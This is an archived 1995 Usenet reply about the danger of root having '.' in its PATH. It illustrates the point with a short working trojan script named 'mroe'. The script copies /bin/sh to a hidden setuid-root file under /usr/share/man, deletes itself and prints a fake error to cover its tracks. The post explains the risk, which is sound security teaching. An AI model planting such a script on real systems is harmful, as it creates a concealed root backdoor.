Return to BSD News archive
Newsgroups: comp.unix.bsd.misc Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!news.sprintlink.net!howland.reston.ans.net!swrinde!news.uh.edu!uuneo.neosoft.com!nmtigw!peter From: peter@nmti.com (Peter da Silva) Subject: Re: running as root with . in path Was: MacBSD ? Message-ID: <id.44CM1.5RD@nmti.com> Sender: peter@nmti.com (peter da silva) Organization: Network/development platform support, NMTI References: <3vhdsc$a1q@rigel.pixi.com> <id.TO2M1.IPE@nmti.com> <MARKG.95Aug8220219@kelly.teleport.com> Date: Wed, 9 Aug 1995 14:40:41 GMT Lines: 22 In article <MARKG.95Aug8220219@kelly.teleport.com>, Mark C. Gay <markg@teleport.com> wrote: > Any way to supress it? You have the source code, don't you? > Also, could you give a little more detail about how this kind of > security glitch would work? Am I correct in assuming that the file > mroe might perhaps contain a rather interesting shell script? Something like this would do it: #!/bin/sh cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 && chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 && rm mroe & echo 'mroe: Command not found.' -- Peter da Silva (NIC: PJD2) `-_-' Bailey Network Management 'U` 1601 Industrial Blvd. Sugar Land, TX 77478 USA +1 713 274 5180 "Har du kramat din varg idag?"